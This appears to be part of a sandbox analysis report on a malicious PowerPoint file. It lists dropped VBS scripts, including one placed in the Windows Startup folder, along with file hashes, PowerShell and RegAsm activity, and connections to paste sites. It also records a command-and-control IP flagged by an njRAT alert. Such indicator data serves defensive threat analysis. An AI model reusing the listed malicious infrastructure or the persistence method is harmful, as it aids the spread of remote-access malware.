1912 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\bFvBy.vbs | text | |
MD5:9E89ECDDC177F7D46517DF67BA7B3671 | SHA256:5833D39A12362E79F080AA19B15141F8396D24BE9A3718CE1378471814A64832 | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | binary | |
MD5:29D6EE4C2C7528AF5B32C3F4ECE09654 | SHA256:958E75B9B3FDB651154104AADB66863EF89D464AF80CEC1B4E699AFA15FC6904 | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | der | |
MD5:9B04B5F2AE9BCC677FF9CF2BF9FB3991 | SHA256:D89168D15D277228C86CB62008238BA181806F6D6FE5988246D9F3B3344AB4C7 | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:2FD3ADD55E4D02D9F02A579CF476D9BC | SHA256:C611B58ED2B652F66691B2350447F36C41C0555AAF4983260A95660A0CD4319F | |||
3244 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FKZVX.vbs | text | |
MD5:9E89ECDDC177F7D46517DF67BA7B3671 | SHA256:5833D39A12362E79F080AA19B15141F8396D24BE9A3718CE1378471814A64832 | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:BB324B9CBC527E21A590704F4AC91EF4 | SHA256:A647E2A7F63C880B702D4456B13FEBDAE1ED575AB1AF643E528558871CD3A51B | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\hhhhhhhh[1].txt | text | |
MD5:73384B143CD0EA376CE992A8AA21D7F8 | SHA256:58C562A4CE0BEC25F7495B7B97E3FAF527AC2A150BED7DA54BBE3B7DFA5A68EC | |||
2284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gec2t2ow.iof.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1912 | POWERPNT.EXE | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted |
1912 | POWERPNT.EXE | GET | 200 | 209.197.3.8:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b82b9b1ac46e0e21 | US | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1912 | POWERPNT.EXE | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2284 | powershell.exe | 172.67.34.170:443 | pastebin.com | — | US | malicious |
1912 | POWERPNT.EXE | 172.67.34.170:443 | pastebin.com | — | US | malicious |
2088 | RegAsm.exe | 172.67.34.170:443 | pastebin.com | — | US | malicious |
1332 | WScript.exe | 172.67.34.170:443 | pastebin.com | — | US | malicious |
1912 | POWERPNT.EXE | 172.67.135.130:443 | wtools.io | — | US | suspicious |
1912 | POWERPNT.EXE | 209.197.3.8:80 | ctldl.windowsupdate.com | Highwinds Network Group, Inc. | US | whitelisted |
2284 | powershell.exe | 172.67.135.130:443 | wtools.io | — | US | suspicious |
2088 | RegAsm.exe | 179.48.155.124:5552 | — | Connexions4London Ltd | PA | malicious |
1332 | WScript.exe | 172.67.135.130:443 | wtools.io | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
wtools.io |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY Observed DNS Query to Pastebin-style Service (wtools .io) |
— | — | A Network Trojan was detected | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) |